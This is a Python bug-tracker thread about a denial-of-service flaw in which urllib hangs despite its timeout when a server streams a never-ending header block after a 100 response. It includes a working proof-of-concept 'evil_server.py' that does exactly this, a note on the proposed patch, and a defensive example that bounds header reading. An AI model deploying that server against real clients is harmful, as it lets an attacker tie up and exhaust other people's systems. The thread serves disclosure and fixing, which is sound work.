[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu


Gen Xu  added the comment:

Looks like it is caused by the httplib not limiting total header size after 
receiving 100. Added a counter for that to be the same size as _MAXLINE=65536.

--
versions:  -Python 3.7

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com



[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu


Gen Xu  added the comment:

Added a possible PR. Review will be appreciated.

--


[issue44022] "urllib" will result to deny of service

2021-05-05 Thread Gen Xu


Change by Gen Xu :


--
keywords: +patch
nosy: +gen-xu
nosy_count: 1.0 -> 2.0
pull_requests: +24585
stage:  -> patch review
pull_request: https://github.com/python/cpython/pull/25916


[issue44022] "urllib" will result to deny of service

2021-05-03 Thread guangli dong


New submission from guangli dong :

If a client requests an http/https/ftp service which is controlled by an attacker, 
the attacker can make this client hang forever, even if the client has set the "timeout" 
argument.

Maybe this client will also consume more and more memory. I did not test 
this conclusion.

client.py
```
import urllib.request

req = urllib.request.Request('http://127.0.0.1:8085')
response = urllib.request.urlopen(req, timeout=1)
```

evil_server.py
```
# coding:utf-8
from socket import *
from multiprocessing import *
from time import sleep

def dealWithClient(newSocket,destAddr):
    recvData = newSocket.recv(1024)
    # Answer with an interim 100 response whose header block never ends.
    newSocket.send(b"""HTTP/1.1 100 OK\n""")

    while True:
        # recvData = newSocket.recv(1024)
        # Keep emitting header lines: because bytes keep arriving, the
        # client's per-recv timeout never fires.
        newSocket.send(b"""x:a\n""")

        if len(recvData)>0:
            # print('recv[%s]:%s'%(str(destAddr), recvData))
            pass
        else:
            print('[%s]close'%str(destAddr))
            sleep(10)
            print('over')
            break

    # newSocket.close()


def main():

    serSocket = socket(AF_INET, SOCK_STREAM)
    serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR  , 1)
    localAddr = ('', 8085)
    serSocket.bind(localAddr)
    serSocket.listen(5)

    try:
        while True:
            newSocket,destAddr = serSocket.accept()

            # One process per connection; each one runs dealWithClient.
            client = Process(target=dealWithClient, args=(newSocket,destAddr))
            client.start()

            newSocket.close()
    finally:
        serSocket.close()

if __name__ == '__main__':
    main()
```

--
components: Library (Lib)
messages: 392825
nosy: leveryd
priority: normal
severity: normal
status: open
title: "urllib" will result to deny of service
type: security
versions: Python 3.7

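The report above shows why a socket timeout alone does not help here: the timeout applies to each individual recv, and a server that keeps trickling header lines after a "100" status always delivers something before it expires. Gen Xu's diagnosis earlier in the thread is that the client never bounds the header block of that interim response. The following is an added illustration of the bounded approach, written for this thread; it is not the code from CPython, from the pull request linked above, or from either poster. MAXLINE mirrors http.client's existing _MAXLINE, while MAX_HEADER_COUNT, MAX_HEADER_BYTES, MAX_INTERIM_RESPONSES and the ResponseTooLarge exception are assumed names and values chosen for the example.

```python
"""Bounded reading of an HTTP response head, including the header blocks of
interim 1xx responses, so a server that never finishes its headers cannot
keep a client reading forever.  Added example, not CPython's own code."""
import io

MAXLINE = 65536            # per-line cap, same value as http.client._MAXLINE
MAX_HEADER_BYTES = 65536   # assumed cap on the total size of one header block
MAX_HEADER_COUNT = 100     # assumed cap on the number of lines in a header block
MAX_INTERIM_RESPONSES = 8  # assumed cap on 1xx responses before the final one


class ResponseTooLarge(Exception):
    """Raised when the server exceeds one of the limits above (hypothetical name)."""


def read_status_line(fp):
    """Read and split 'HTTP/x.y STATUS REASON'; refuse over-long or missing lines."""
    line = fp.readline(MAXLINE + 1)
    if len(line) > MAXLINE:
        raise ResponseTooLarge("status line longer than %d bytes" % MAXLINE)
    if not line:
        raise ConnectionError("connection closed before a status line arrived")
    parts = line.decode("iso-8859-1").split(None, 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("bad status line: %r" % line)
    reason = parts[2].strip() if len(parts) > 2 else ""
    return parts[0], int(parts[1]), reason


def read_headers(fp):
    """Return the raw header lines up to and including the blank terminator.

    Three independent bounds are enforced: per-line length, total bytes in the
    block, and number of lines.  An endless stream of short lines such as
    b'x:a\\n' trips the count (or byte) limit instead of looping forever."""
    headers = []
    total = 0
    while True:
        line = fp.readline(MAXLINE + 1)
        if len(line) > MAXLINE:
            raise ResponseTooLarge("header line longer than %d bytes" % MAXLINE)
        total += len(line)
        if total > MAX_HEADER_BYTES:
            raise ResponseTooLarge("header block larger than %d bytes" % MAX_HEADER_BYTES)
        headers.append(line)
        if len(headers) > MAX_HEADER_COUNT:
            raise ResponseTooLarge("more than %d header lines" % MAX_HEADER_COUNT)
        if line in (b"\r\n", b"\n", b""):   # terminator, or EOF
            return headers


def read_response_head(fp):
    """Skip interim 1xx responses (each with its own bounded header block) and
    return (version, status, headers) of the final response."""
    interim = 0
    while True:
        version, status, _reason = read_status_line(fp)
        if status != 100:
            break
        interim += 1
        if interim > MAX_INTERIM_RESPONSES:
            raise ResponseTooLarge("more than %d interim responses" % MAX_INTERIM_RESPONSES)
        read_headers(fp)   # the skipped block is bounded just like the real one
    return version, status, read_headers(fp)


def parse_bytes(data):
    """Run the bounded reader over an in-memory byte string."""
    return read_response_head(io.BytesIO(data))


def is_rejected(data):
    """True if the bounded reader refuses this response head."""
    try:
        parse_bytes(data)
    except ResponseTooLarge:
        return True
    return False


# Constructed sample inputs (not captured traffic).
GOOD_RESPONSE = (b"HTTP/1.1 100 Continue\r\n\r\n"
                 b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
ENDLESS_SHORT_HEADERS = b"HTTP/1.1 100 OK\n" + b"x:a\n" * 200          # like the PoC
FEW_BUT_HUGE_HEADERS = b"HTTP/1.1 100 OK\n" + (b"x:" + b"a" * 1998 + b"\n") * 40
ENDLESS_INTERIMS = b"HTTP/1.1 100 Continue\r\n\r\n" * 9 + b"HTTP/1.1 200 OK\r\n\r\n"

if __name__ == "__main__":
    print(parse_bytes(GOOD_RESPONSE))
    for sample in (ENDLESS_SHORT_HEADERS, FEW_BUT_HUGE_HEADERS, ENDLESS_INTERIMS):
        print("rejected:", is_rejected(sample))
```

The count and byte caps are deliberately separate: many tiny lines exhaust one, a few enormous lines exhaust the other, and the per-line cap alone (which the original skip loop already had) catches neither. The cap on interim responses closes the remaining unbounded loop in the same function.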